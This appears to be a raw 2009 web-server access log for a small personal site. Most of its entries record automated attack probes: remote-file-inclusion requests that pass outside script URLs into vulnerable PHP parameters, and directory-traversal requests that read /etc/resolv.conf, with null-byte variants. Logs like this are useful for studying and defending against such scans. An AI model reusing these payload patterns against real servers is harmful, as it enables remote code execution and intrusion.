200.40.86.142 - - [20/Nov/2009:10:43:15 -0800] "GET /logs/access_080318.log/includes/kb_constants.php?module_root_path=http://www.iopentech.com//images/dvd/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.111.181 - - [20/Nov/2009:10:43:54 -0800] "GET /logs/access_090908.log HTTP/1.0" 200 2932215 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.186.64.163 - - [20/Nov/2009:10:44:15 -0800] "GET /logs/access_081121.log%20%20//galeria.php?start=0&kategoria=http://www.cbnumed.or.kr/bbs/enda-id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.186.64.163 - - [20/Nov/2009:10:44:15 -0800] "GET /logs/access_090623.log%20%20//galeria.php?start=0&kategoria=http://www.cbnumed.or.kr/bbs/enda-id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.4.32.137 - - [20/Nov/2009:10:44:36 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.alandar.net/www2/cid??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
61.109.247.40 - - [20/Nov/2009:10:44:55 -0800] "GET /logs/access_090911.log//lost.php?p=http://www.dhszgh.org/eBook.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:45:17 -0800] "GET /logs/access_090713.log%20%20///outlogin.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:45:17 -0800] "GET //outlogin.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:45:17 -0800] "GET /logs///outlogin.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:45:22 -0800] "GET //outlogin.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:45:22 -0800] "GET /logs/access_090713.log%20%20///outlogin.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:45:22 -0800] "GET /logs///outlogin.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:10:45:48 -0800] "GET /logs/access_080606.log//bemarket/postscript/postscript.php?p_mode=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:10:45:48 -0800] "GET /bemarket/postscript/postscript.php?p_mode=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:10:45:48 -0800] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:10:45:52 -0800] "GET /logs/access_080808.log//bemarket/postscript/postscript.php?p_mode=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:10:46:01 -0800] "GET /bemarket/postscript/postscript.php?p_mode=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:10:46:01 -0800] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:10:46:01 -0800] "GET /logs/access_080606.log%20%20//bemarket/postscript/postscript.php?p_mode=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:10:46:06 -0800] "GET /logs/access_080808.log%20%20//bemarket/postscript/postscript.php?p_mode=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.41.129.203 - - [20/Nov/2009:10:46:48 -0800] "GET /logs/access_090308.log/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.denengeldiest.be/pictures/Events/Kajakken/id? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
82.41.129.203 - - [20/Nov/2009:10:46:48 -0800] "GET /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.denengeldiest.be/pictures/Events/Kajakken/id? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
82.41.129.203 - - [20/Nov/2009:10:46:48 -0800] "GET /logs/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.denengeldiest.be/pictures/Events/Kajakken/id? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:10:47:09 -0800] "GET /bemarket/postscript/postscript.php?p_mode=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:10:47:09 -0800] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:10:47:09 -0800] "GET /logs/access_080606.log//bemarket/postscript/postscript.php?p_mode=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.188.43.201 - - [20/Nov/2009:10:47:11 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?BBCodeFile=http://bagoes.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.188.43.201 - - [20/Nov/2009:10:47:11 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?BBCodeFile=http://bagoes.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.188.43.201 - - [20/Nov/2009:10:47:11 -0800] "GET /logs/access_090604.log%20%20/administrator/components/com_comprofiler/plugin.class.php?BBCodeFile=http://bagoes.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.188.43.201 - - [20/Nov/2009:10:47:11 -0800] "GET /logs/access_090226.log%20%20/administrator/components/com_comprofiler/plugin.class.php?BBCodeFile=http://bagoes.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:10:47:14 -0800] "GET /logs/access_080808.log//bemarket/postscript/postscript.php?p_mode=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.188.43.201 - - [20/Nov/2009:10:47:16 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?BBCodeFile=http://bagoes.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.188.43.201 - - [20/Nov/2009:10:47:16 -0800] "GET /logs/access_090604.log%20%20/administrator/components/com_comprofiler/plugin.class.php?BBCodeFile=http://bagoes.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.188.43.201 - - [20/Nov/2009:10:47:16 -0800] "GET /logs/access_090604.log%20%20/administrator/components/com_comprofiler/plugin.class.php?BBCodeFile=http://bagoes.fileave.com/id1.txt???%20%20? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.188.43.201 - - [20/Nov/2009:10:47:16 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?BBCodeFile=http://bagoes.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.188.43.201 - - [20/Nov/2009:10:47:16 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?BBCodeFile=http://bagoes.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.188.43.201 - - [20/Nov/2009:10:47:16 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?BBCodeFile=http://bagoes.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.188.43.201 - - [20/Nov/2009:10:47:16 -0800] "GET /logs/access_090226.log%20%20/administrator/components/com_comprofiler/plugin.class.php?BBCodeFile=http://bagoes.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.188.43.201 - - [20/Nov/2009:10:47:16 -0800] "GET /logs/access_090226.log%20%20/administrator/components/com_comprofiler/plugin.class.php?BBCodeFile=http://bagoes.fileave.com/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:10:48:35 -0800] "GET /logs/access_090724.log//bemarket/postscript/postscript.php?p_mode=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:10:48:35 -0800] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:10:48:35 -0800] "GET /bemarket/postscript/postscript.php?p_mode=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:10:48:45 -0800] "GET /logs/access_090627.log//bemarket/postscript/postscript.php?p_mode=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.40.86.142 - - [20/Nov/2009:10:48:56 -0800] "GET /logs/access_080318.log/includes/kb_constants.php?module_root_path=http://www.iopentech.com//images/dvd/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.40.86.142 - - [20/Nov/2009:10:48:56 -0800] "GET /logs/access_091024.log/includes/kb_constants.php?module_root_path=http://www.iopentech.com//images/dvd/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.111.181 - - [20/Nov/2009:10:49:26 -0800] "GET /bikes/dteel/2008_02_15/?M=D HTTP/1.0" 200 1118 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:10:50:04 -0800] "GET /index.php?get=http://204.3.167.134/bbs/skin/zinbbs/zimg/echo????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 200 16305 "-" "-" "www.dmulk.com"
70.38.31.183 - - [20/Nov/2009:10:50:09 -0800] "GET /home.php?index=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [20/Nov/2009:10:50:09 -0800] "GET /logs/access_090506.log/home.php?index=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [20/Nov/2009:10:50:09 -0800] "GET /logs/access_090506.log/home.php?index=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [20/Nov/2009:10:50:09 -0800] "GET /home.php?index=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [20/Nov/2009:10:50:09 -0800] "GET /logs/home.php?index=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [20/Nov/2009:10:50:09 -0800] "GET /logs/home.php?index=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [20/Nov/2009:10:50:20 -0800] "GET /home.php?index=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [20/Nov/2009:10:50:20 -0800] "GET /logs/home.php?index=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [20/Nov/2009:10:50:24 -0800] "GET /logs/access_090506.log/home.php?index=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:50:55 -0800] "GET /logs/access.log///skin/daerew_DICAgallery_GD/setup.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:50:55 -0800] "GET /logs///skin/daerew_DICAgallery_GD/setup.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:50:55 -0800] "GET //skin/daerew_DICAgallery_GD/setup.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:50:55 -0800] "GET //skin/daerew_DICAgallery_GD/setup.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:50:55 -0800] "GET /logs///skin/daerew_DICAgallery_GD/setup.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:50:55 -0800] "GET /logs/access.log///skin/daerew_DICAgallery_GD/setup.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:50:56 -0800] "GET /logs///skin/daerew_DICAgallery_GD/setup.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:50:56 -0800] "GET /logs/access.log%20%20///skin/daerew_DICAgallery_GD/setup.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:50:56 -0800] "GET //skin/daerew_DICAgallery_GD/setup.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:50:56 -0800] "GET /logs///skin/daerew_DICAgallery_GD/setup.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:50:56 -0800] "GET /logs/access.log%20%20///skin/daerew_DICAgallery_GD/setup.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:50:57 -0800] "GET //skin/daerew_DICAgallery_GD/setup.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:51:03 -0800] "GET /logs///skin/daerew_DICAgallery_GD/setup.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:51:03 -0800] "GET /logs/access.log///skin/daerew_DICAgallery_GD/setup.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:51:03 -0800] "GET //skin/daerew_DICAgallery_GD/setup.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:51:03 -0800] "GET //skin/daerew_DICAgallery_GD/setup.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:51:03 -0800] "GET /logs///skin/daerew_DICAgallery_GD/setup.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:10:51:03 -0800] "GET /logs/access.log///skin/daerew_DICAgallery_GD/setup.php?=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.111.181 - - [20/Nov/2009:10:51:27 -0800] "GET /logs/access_071021.log HTTP/1.0" 200 17408 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.213.177.58 - - [20/Nov/2009:10:51:42 -0800] "GET /logs/access_090329.log//galeria.php?start=0&kategoria=http://www.oficinaprogresso.com.br/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
74.213.177.58 - - [20/Nov/2009:10:51:42 -0800] "GET /logs/access_090623.log//galeria.php?start=0&kategoria=http://www.oficinaprogresso.com.br/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
74.213.177.58 - - [20/Nov/2009:10:51:42 -0800] "GET /galeria.php?start=0&kategoria=http://www.oficinaprogresso.com.br/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
74.213.177.58 - - [20/Nov/2009:10:51:42 -0800] "GET /logs//galeria.php?start=0&kategoria=http://www.oficinaprogresso.com.br/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.111.181 - - [20/Nov/2009:10:51:44 -0800] "GET /bikes/GPS/WeSTOC2008/?N=D HTTP/1.0" 200 842 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.213.177.58 - - [20/Nov/2009:10:52:10 -0800] "GET /galeria.php?start=0&kategoria=http://www.oficinaprogresso.com.br/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
74.213.177.58 - - [20/Nov/2009:10:52:10 -0800] "GET /logs/access_090623.log//galeria.php?start=0&kategoria=http://www.oficinaprogresso.com.br/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
74.213.177.58 - - [20/Nov/2009:10:52:10 -0800] "GET /logs/access_090329.log//galeria.php?start=0&kategoria=http://www.oficinaprogresso.com.br/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
74.213.177.58 - - [20/Nov/2009:10:52:10 -0800] "GET /logs//galeria.php?start=0&kategoria=http://www.oficinaprogresso.com.br/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.31.183 - - [20/Nov/2009:10:52:48 -0800] "GET /logs/access_090806.log%20%20/home.php?index=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:10:52:56 -0800] "GET /logs/access_080830.log%20//index.php?inc=http://204.3.167.134/bbs/skin/zinbbs/zimg/echo????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:10:52:56 -0800] "GET /logs//index.php?inc=http://204.3.167.134/bbs/skin/zinbbs/zimg/echo????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:10:52:57 -0800] "GET /index.php?inc=http://204.3.167.134/bbs/skin/zinbbs/zimg/echo????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 200 16305 "-" "-" "www.dmulk.com"
70.38.31.183 - - [20/Nov/2009:10:53:00 -0800] "GET /logs/access_090806.log%20%20/home.php?index=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.111.181 - - [20/Nov/2009:10:53:03 -0800] "GET /bikes/dteel/2008_10_28/ HTTP/1.0" 200 1678 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
76.13.192.36 - - [20/Nov/2009:10:53:07 -0800] "GET /retreat1_21984.jpg HTTP/1.1" 404 - "-" "YahooCacheSystem" "dmulk.com"
195.186.64.163 - - [20/Nov/2009:10:53:07 -0800] "GET /logs/access_090614.log//galeria.php?start=0&kategoria=http://www.cbnumed.or.kr/bbs/enda-id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.186.64.163 - - [20/Nov/2009:10:53:08 -0800] "GET /logs/access_081230.log//galeria.php?start=0&kategoria=http://www.cbnumed.or.kr/bbs/enda-id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.221.47 - - [20/Nov/2009:10:53:36 -0800] "GET /spaw_control.class.php?spaw_root=http://www.karlbergs.nu/popup_mode/links/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.221.47 - - [20/Nov/2009:10:53:36 -0800] "GET /logs/spaw_control.class.php?spaw_root=http://www.karlbergs.nu/popup_mode/links/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.221.47 - - [20/Nov/2009:10:53:36 -0800] "GET /logs/access_071228.log/spaw_control.class.php?spaw_root=http://www.karlbergs.nu/popup_mode/links/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.221.47 - - [20/Nov/2009:10:53:40 -0800] "GET /logs/access_080701.log/spaw_control.class.php?spaw_root=http://www.karlbergs.nu/popup_mode/links/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [20/Nov/2009:10:54:36 -0800] "GET /logs/access_090806.log%20%20/home.php?index=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:10:54:40 -0800] "GET /logs/access_080626.log%20//index.php?url=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:10:54:40 -0800] "GET /logs//index.php?url=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:10:54:41 -0800] "GET /logs/access_080626.log%20//index.php?url=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:10:54:41 -0800] "GET /logs//index.php?url=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:10:54:41 -0800] "GET /index.php?url=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 200 15936 "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:10:54:41 -0800] "GET /logs/access_080626.log%20//index.php?url=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:10:54:41 -0800] "GET /logs//index.php?url=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:10:54:42 -0800] "GET /index.php?url=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 200 15939 "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:10:54:44 -0800] "GET /index.php?url=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 200 15932 "-" "-" "www.dmulk.com"
190.97.219.4 - - [20/Nov/2009:10:55:02 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.97.219.4 - - [20/Nov/2009:10:55:02 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.97.219.4 - - [20/Nov/2009:10:55:05 -0800] "GET /logs/scriptsold.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.97.219.4 - - [20/Nov/2009:10:55:10 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.97.219.4 - - [20/Nov/2009:10:55:10 -0800] "GET /logs/scriptsold.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.97.219.4 - - [20/Nov/2009:10:55:10 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:10:55:16 -0800] "GET /index.php?get=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 200 15936 "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:10:55:18 -0800] "GET /index.php?get=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 200 15939 "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:10:55:19 -0800] "GET /index.php?get=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 200 15932 "-" "-" "www.dmulk.com"
222.236.221.47 - - [20/Nov/2009:10:56:09 -0800] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://www.karlbergs.nu/popup_mode/links/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.221.47 - - [20/Nov/2009:10:56:10 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.karlbergs.nu/popup_mode/links/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.221.47 - - [20/Nov/2009:10:56:10 -0800] "GET /logs/access_080111.log%20%20/admin/spaw/spaw_control.class.php?spaw_root=http://www.karlbergs.nu/popup_mode/links/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
76.13.192.35 - - [20/Nov/2009:10:56:26 -0800] "GET /retreat1_21962.jpg HTTP/1.1" 404 - "-" "YahooCacheSystem" "dmulk.com"
